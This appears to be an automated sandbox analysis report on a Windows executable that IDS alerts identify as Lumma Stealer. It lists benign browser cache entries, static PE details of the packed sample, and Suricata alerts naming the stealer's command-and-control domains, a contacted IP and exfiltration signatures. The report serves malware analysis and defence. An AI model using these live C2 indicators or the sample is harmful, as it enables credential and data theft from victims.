Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 91

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65410)
Category:	downloaded
Size (bytes):	195728
Entropy (8bit):	5.430027724194099
Encrypted:	false
SSDEEP:	3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliC:Wof3G0NSkNzMeO7z/l3lv
MD5:	8C014A373259BD827165E8CAAE359A09
SHA1:	59BE164672ACF75E02747FCFB642107AEAF40FA2
SHA-256:	D02B12A9BA249AEFE7F8E2C2C9126DCCAE26930B6B78823ABBF4509F1878C588
SHA-512:	BB97F0F6DE01317FEF78F4239407BBF9938726D0054DFB44F76D97214CB77C4F1B8604943EC830196D81BD3F0C90B07F2DDF4F0D5D3AB4842543A1C9738CDF6B
Malicious:	false
URL:	https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Preview:	/!. 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e\|\|self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]\|\|{},d=(d=e)[l="oneDS"]=d[l]\|\|{},e=f[o]=f[o]\|\|{},p=e.v=e.v\|\|[],l=d[o]=d[o]\|\|{},g=l.v=l.v\|\|[];for(i in(l.o=l.o\|\|[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]\|\|(g[i]="---"),(u[r]=u[r]\|\|[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e\|\|t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

Chrome Cache Entry: 92

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	27868
Entropy (8bit):	5.155680085584642
Encrypted:	false
SSDEEP:	768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
MD5:	0A0F2E1CCB8E5F7C38CB11B101A8941F
SHA1:	112F4B7CB3DEDB9D9744CAC000E05DC949E89891
SHA-256:	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
SHA-512:	9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/banners/index.json
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 93

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 94

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	1432
Entropy (8bit):	4.986131881931089
Encrypted:	false
SSDEEP:	24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:	6B8763B76F400DC480450FD69072F215
SHA1:	6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:	8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/global/deprecation.js
Preview:	// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	464328
Entropy (8bit):	5.0747157240281755
Encrypted:	false
SSDEEP:	6144:XegPrbKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:1KCerXyUh
MD5:	875E7F3672FEC41DDB5A2386D2331531
SHA1:	282979933E99BDE3A6342DC1EF93FBC51682F2C3
SHA-256:	F205B3CBA340ECB0B5D45E5DE6D385947CC4C21248707A90BFD5894E9B61F3C9
SHA-512:	67A3C1D8FF089E01C20962D96968DE43F3E8D49B474C396F08827EE891C0315693634E663D3148D7441B501EA6939A7D84A80B1E855B7C2A8BCB17E0013AFAD4
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/styles/site-ltr.css
Preview:	.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0

Chrome Cache Entry: 96

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	dropped
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	downloaded
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
URL:	https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 98

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	exported SGML document, ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	1173007
Entropy (8bit):	5.503893944397598
Encrypted:	false
SSDEEP:	24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
MD5:	2E00D51C98DBB338E81054F240E1DEB2
SHA1:	D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
SHA-256:	300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
SHA-512:	B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
Malicious:	false
URL:	https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
Preview:	(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends\|\|(n=function(t,e){return n=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}\|\|function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign\|\|function(){return i=Object.assign\|\|function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read\|\|function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e\|\|e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (46884)
Category:	dropped
Size (bytes):	1817143
Entropy (8bit):	5.501007973622959
Encrypted:	false
SSDEEP:	24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
MD5:	F57E274AE8E8889C7516D3E53E3EB026
SHA1:	F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
SHA-256:	2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
SHA-512:	9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
Malicious:	false
Preview:	"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t\|\|e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"\|\|typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))\|\|n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t\|\|!e\|\|!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))\|\|r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.531386510804356
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	z3IxCpcpg4.exe
File size:	2'926'592 bytes
MD5:	764b683cac60e423ff3659606d250cb4
SHA1:	c2117ac35e093453512c0cd0bb9a4a02eb7b50ba
SHA256:	ef2573bda777bead9483d197af10c4cb9b485dccdba83f2a51e350ea44a3cbd1
SHA512:	6d725765f0140a3b29816eb8f03739da48b2edb44399d53fa6fe958e3f20713e9a187b0fcfd1a50f3a97824b8220542bdecf1fba8ac1b4c9de10769032b4395f
SSDEEP:	49152:wcXO/f9u2w13riAWF5UHU+ZlZJuT1SF29q1047iGAsUW2/cEl2Azz:wwZ2wFriAWF5U0+lZJ01S8I57iGtbQ7
TLSH:	9FD55A92B84576CFD8DA17B48523CE92E86D47BA072058D3D85C74BEBDB7DC112B2C28
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig.............................p/...........@.........................../.......,...@.................................Y@..m..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x6f7000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F83AD62AEDAh
jbe 00007F83AD62AF02h
add byte ptr [eax], al
jmp 00007F83AD62CED5h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26400	803044cea3c6c09f7c9f64078ee93400	False	0.9993936376633987	OpenPGP Secret Key	7.976067853039972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xufdfdiy	0x55000	0x2a1000	0x2a0c00	64dde4b2b2398f8dd2a0e5c9860abac0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kfvcltou	0x2f6000	0x1000	0x400	b0e35ad9c4175d5b4b344d32b891e904	False	0.7412109375	data	5.905304359673516	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x2f7000	0x3000	0x2200	80e9c563de185c5d50cb175a0373bbed	False	0.06364889705882353	DOS executable (COM)	0.7437343243709107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T13:01:25.292052+0100	2058514	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)	1	192.168.2.5	61173	1.1.1.1	53	UDP
2024-12-26T13:01:25.432079+0100	2058502	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)	1	192.168.2.5	64990	1.1.1.1	53	UDP
2024-12-26T13:01:25.582955+0100	2058492	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)	1	192.168.2.5	58231	1.1.1.1	53	UDP
2024-12-26T13:01:25.732879+0100	2058500	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)	1	192.168.2.5	50265	1.1.1.1	53	UDP
2024-12-26T13:01:25.900917+0100	2058510	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)	1	192.168.2.5	51908	1.1.1.1	53	UDP
2024-12-26T13:01:26.076952+0100	2058484	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)	1	192.168.2.5	65147	1.1.1.1	53	UDP
2024-12-26T13:01:26.219001+0100	2058512	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)	1	192.168.2.5	62124	1.1.1.1	53	UDP
2024-12-26T13:01:26.360816+0100	2058480	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)	1	192.168.2.5	51436	1.1.1.1	53	UDP
2024-12-26T13:01:28.141742+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	23.55.153.106	443	TCP
2024-12-26T13:01:29.100945+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	49704	23.55.153.106	443	TCP
2024-12-26T13:01:30.733467+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	104.21.66.86	443	TCP
2024-12-26T13:01:31.481959+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49705	104.21.66.86	443	TCP
2024-12-26T13:01:31.481959+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	104.21.66.86	443	TCP
2024-12-26T13:01:33.144268+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	104.21.66.86	443	TCP
2024-12-26T13:01:33.933975+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49706	104.21.66.86	443	TCP
2024-12-26T13:01:33.933975+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49706	104.21.66.86	443	TCP
2024-12-26T13:01:36.211480+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49707	104.21.66.86	443	TCP
2024-12-26T13:01:38.601811+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	104.21.66.86	443	TCP
2024-12-26T13:01:41.186001+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	104.21.66.86	443	TCP
2024-12-26T13:01:44.394122+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49718	104.21.66.86	443	TCP
2024-12-26T13:01:45.311919+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49718	104.21.66.86	443	TCP
2024-12-26T13:01:47.331083+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49725	104.21.66.86	443	TCP
2024-12-26T13:01:52.435030+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49737	104.21.66.86	443	TCP
2024-12-26T13:01:53.243715+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49737	104.21.66.86	443	TCP
